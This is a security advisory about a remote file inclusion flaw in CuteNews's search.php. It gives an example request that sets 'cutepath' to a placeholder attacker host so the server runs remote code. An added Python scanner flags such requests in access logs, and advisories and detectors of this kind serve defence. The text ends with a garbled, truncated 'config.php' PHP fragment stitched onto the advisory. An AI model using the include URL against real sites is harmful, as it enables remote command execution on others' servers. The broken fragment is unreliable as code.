source: https://www.securityfocus.com/bid/6935/info
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.
http://www.example.com/cutenews/search.php?cutepath=http://<attacker_site>/config.php
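
A detection check for the request pattern shown above, added here as an example and not part of the original advisory: it scans access-log lines for a `cutepath` query parameter whose decoded value starts with a URL scheme, is protocol-relative, or is a UNC path. The log format (combined/common), the sample lines, and the host `remote.example` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme, "//" (protocol-relative) or "\\" (UNC).
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)
PARAM = "cutepath"  # parameter named in the advisory's example URL

SAMPLE_LOG = [  # constructed log lines, not taken from a real server
    '192.0.2.10 - - [01/Mar/2003:10:00:01 +0000] "GET /cutenews/search.php'
    '?cutepath=http://remote.example/config.php HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Mar/2003:10:00:05 +0000] "GET /cutenews/search.php'
    '?cutepath=HTTP%3A%2F%2Fremote.example%2Fconfig.php HTTP/1.0" 200 512',
    '192.0.2.12 - - [01/Mar/2003:10:00:09 +0000] "GET /cutenews/search.php'
    '?story=cute HTTP/1.0" 200 2048',
    '192.0.2.13 - - [01/Mar/2003:10:00:12 +0000] "GET /cutenews/search.php'
    '?cutepath=. HTTP/1.0" 200 2048',
]


def remote_cutepath(log_line):
    """Return (client, value) if cutepath points off-host, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qsl percent-decodes once, matching what the application receives.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name == PARAM and REMOTE_RE.match(value):
            return client, value.strip()
    return None


def scan(lines):
    """Collect every flagged (client, value) pair from an iterable of lines."""
    return [hit for hit in map(remote_cutepath, lines) if hit]


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"remote include attempt from {client}: cutepath={value}")
```

Parameters sent in a POST body or cookie are not recorded in a standard access log, so this covers only the query-string form shown in the URL above.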
----------------------------------config.php----------------------------------------
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>